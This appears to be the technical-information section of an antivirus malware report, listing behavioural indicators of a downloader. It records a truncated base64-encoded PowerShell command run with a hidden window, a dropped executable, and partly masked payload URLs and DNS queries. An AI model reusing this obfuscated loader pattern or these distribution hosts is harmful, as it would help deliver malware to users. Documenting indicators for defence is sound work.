Technical information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABWAGoAdwBxAGEAZQBvAGUAcQA9ACcAUQBvAG8AeQBtAGkAbAB3AGsAJwA7ACQAQwBxAG0AcABjAHYAYQBvAHAAIAA9ACAAJwA4AD...
- %HOMEPATH%\835.exe
- http://to####rts24.live/chargers-titans/images/XhIVbKz/
- http://pr#####dregistry.com/options/YnOTgpIn/
- http://di###our.top/digitraveltour.com/c8lhti-jsna7m-808443746/
- DNS ASK to####rts24.live
- DNS ASK pr#####dregistry.com
- DNS ASK di###our.top
- DNS ASK ec###dpak.co.uk
- DNS ASK so####ongkhoe.site
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABWAGoAdwBxAGEAZQBvAGUAcQA9ACcAUQBvAG8AeQBtAGkAbAB3AGsAJwA7ACQAQwBxAG0AcABjAHYAYQBvAHAAIAA9ACAAJwA4AD...' (with a hidden window)